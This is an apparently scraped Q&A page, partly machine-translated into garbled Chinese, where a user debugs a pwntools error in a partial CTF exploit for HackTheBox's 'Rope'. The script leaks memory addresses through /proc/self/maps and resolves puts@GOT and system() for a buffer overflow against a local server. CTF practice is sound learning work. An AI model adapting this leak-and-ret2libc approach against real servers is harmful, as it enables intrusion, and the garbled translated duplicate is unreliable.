Fatal编程技术网
  • python/
  • Python TypeError:uuu init_uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu;检查SEC和x27;

Python TypeError:uuu init_uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu;检查SEC和x27;

python python-3.x visual-studio error-handling

Python TypeError:uuu init_uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu;检查SEC和x27;,python,python-3.x,visual-studio,error-handling,buffer-overflow,Python,Python 3.x,Visual Studio,Error Handling,Buffer Overflow,我正在看这段视频(Ippsec的Rope CTF),他定义了checksec参数。 该漏洞是httpserver(自定义服务器)中的缓冲区溢出。第1步工作得非常好第一个错误发生在步骤2的elf=elf(“./httpserver”,checksec=False)和libc=elf(“./libc.so.6.32.self”,checksec=False) 来自pwn导入的* 导入请求 上下文(arch=“i686”,os=“linux”) RHOST='127.0.0.1' RPORT='999

我正在看这段视频(Ippsec的Rope CTF),他定义了checksec参数。 该漏洞是httpserver(自定义服务器)中的缓冲区溢出。第1步工作得非常好第一个错误发生在步骤2的elf=elf(“./httpserver”,checksec=False)libc=elf(“./libc.so.6.32.self”,checksec=False)

来自pwn导入的
*
导入请求
上下文(arch=“i686”,os=“linux”)
RHOST='127.0.0.1'
RPORT='9999'
def getFile(文件):
标头={“范围”:“字节=0-4096”}
r=requests.get(f“http://{RHOST}:{RPORT}/{file}”,headers=header)
返回r.text
#第一步。查找地址#这部分工作正常
log.info(“通过/proc/self/maps查找二进制/Libc位置”)
maps=getFile(“/proc/self/maps”)
addr_bin=maps.split('\n')[0][:8]#httpserver的addr
addr#u libc=maps.split('\n')[6][:8]#libc.so.6的addr
成功(f“二进制文件位于:0x{addr\u bin}”)
成功(f“二进制文件位于:0x{addr_libc}”)
#第二步。计算偏移量#发生此截面错误
log.info(“查找put+SYSTEM()的地址”)

elf=elf(“./httpserver”,checksec=False)#我相信你抓到了Python3 PwnTools,这是PwnTools不支持py3时的一个旧分支。安装常规的“pwntools”,它应该可以工作。
我想模块
pwn
有一个
ELF
类。您应该打开它,看看函数
\uuuu init\uuuu
是如何构建的。我在文件位置“/usr/local/lib/python3.8/distpackages/pwn/\uu init\uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu!

from pwn import *
import requests

context(arch="i686",os="linux")

RHOST = '127.0.0.1'
RPORT = '9999'

def getFile(file):
    header = {"Range" : "bytes=0-4096"}
    r = requests.get(f"http://{RHOST}:{RPORT}/{file}",headers=header)
    return r.text

#step 1. Find Address                                 #THIS PART WORKS FINE

log.info("Finding Binary/Libc Location via /proc/self/maps")
maps = getFile("/proc/self/maps")
addr_bin = maps.split('\n')[0][:8]            #addr of httpserver
addr_libc = maps.split('\n')[6][:8]           #addr of libc.so.6
log.success(f"Binary is at : 0x{addr_bin}")
log.success(f"Binary is at : 0x{addr_libc}")

#step 2. Calculating offsets                           #THIS SECTION ERROR OCCURS

log.info("Finding the address of PUTS + SYSTEM()")
elf = ELF("./httpserver" , checksec=False)             #<----ERROR HERE checksec
libc = ELF("./libc.so.6.32.self", checksec= False)     #<----ERROR HERE checksec
elf.address = int(addr_bin, 16)
libc.address = int(addr_libc, 16)
got_puts = elf.got['puts']                             #<----ERROR HERE puts
system = libc.symbols['system']
log.success(f"Puts@GOT: {got_puts}")
log.success(f"SYSTEM@LIBC: {system}")



Traceback (most recent call last):
  File "/home/evildead/Desktop/ctf/htb/rope/files/exploit.py", line 27, in <module>
    elf = ELF("./httpserver" , checksec= False)
TypeError: __init__() got an unexpected keyword argument 'checksec'



Exception has occurred: KeyError
'puts'
  File "/home/evildead/Desktop/ctf/htb/rope/files/exploit.py", line 30, in <module>
    got_puts = elf.got['puts']